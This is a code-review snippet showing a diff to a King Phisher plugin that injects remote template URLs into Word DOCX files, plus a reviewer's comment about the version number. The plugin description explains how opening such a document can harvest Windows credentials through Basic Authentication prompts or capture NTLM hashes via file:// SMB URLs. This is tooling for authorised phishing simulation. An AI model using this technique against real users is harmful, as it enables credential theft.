client/phishery_docx.py

```diff
@@ -18,45 +23,74 @@ def path_is_doc_file(path):
 	with zipfile.ZipFile(input_file, 'r') as zin:
 		settings = zin.read('word/settings.xml')
 	settings = settings.decode('utf-8')
-	settings = settings.replace('/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
+	for rid in rids:
+		settings = settings.replace('/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
 	patches['word/settings.xml'] = settings
 	archive.patch_zipfile(input_file, patches, output_file=output_file)
 
 class Plugin(getattr(plugins, 'ClientPluginMailerAttachment', plugins.ClientPlugin)):
-	authors = ['Ryan Hanson', 'Spencer McIntyre']
+	authors = ['Ryan Hanson', 'Spencer McIntyre', 'Erik Daguerre']
 	title = 'Phishery DOCX URL Injector'
 	description = """
-	Use Phishery to inject Word Document Template URLs into DOCX files. This can
-	be used in conjunction with a server page that requires Basic Authentication
-	to collect Windows credentials. Note that for HTTPS URLs, the King Phisher
-	server needs to be configured with a proper, trusted SSL certificate for
-	the user to be presented with the basic authentication prompt.
-
+	Inject Word Document Template URLs into DOCX files. The Phishery technique is
+	used to place multiple document template URLs into the word document (one per
+	line from the plugin settings).\n\n
+	* HTTP URL\n\n
+	The Jinja variable {{ url.webserver }} can be used for an HTTP URL to track when
+	documents are opened.\n
+	Note that to only track opened documents, DO NOT put a URL link into the
+	phishing email to the landing page. This will ensure that visits are only
+	registered for instance where the document is opened.\n\n
+	* HTTPS URL\n\n
+	The Jinja variable {{ url.webserver }} can be used for an HTTPS landing page
+	that requires basic authentication.\n
+	Note that for HTTPS URLs, the King Phisher server needs to be configured with a
+	proper, trusted SSL certificate for the user to be presented with the basic
+	authentication prompt.\n\n
+	* FILE URL\n\n
+	Utilizing the file://yourtargetserver/somepath URL format will capture SMB
+	credentials.\n
+	Note that King Phisher does not support SMB, and utilization of SMB requires
+	that a separate capture/sniffer application such as Metasploit's
+	auxiliary/server/capture/smb module will have to be used to capture NTLM hashes.
+	The plugin and King Phisher will only support injecting the URL path into the
+	document.\n\n
+	Original Project:\n
 	Phishery homepage: https://github.com/ryhanson/phishery
 	"""
 	homepage = 'https://github.com/securestate/king-phisher-plugins'
 	options = [
 		plugins.ClientOptionString(
 			'target_url',
-			'An optional target URL. The default is the phishing URL.',
+			'An optional target URLs. The default is the phishing URLs.',
 			default='{{ url.webserver }}',
-			display_name='Target URL'
+			display_name='Target URLs',
+			**({'multiline': True} if api_compatible else {})
 		)
 	]
-	req_min_version = '1.9.0b5'
-	version = '2.0.1'
+	req_min_version = min_version
+	version = '2.0.2'
```

Comment:
These are sizable changes that are not bug fixes, so this should be `2.1.0` now.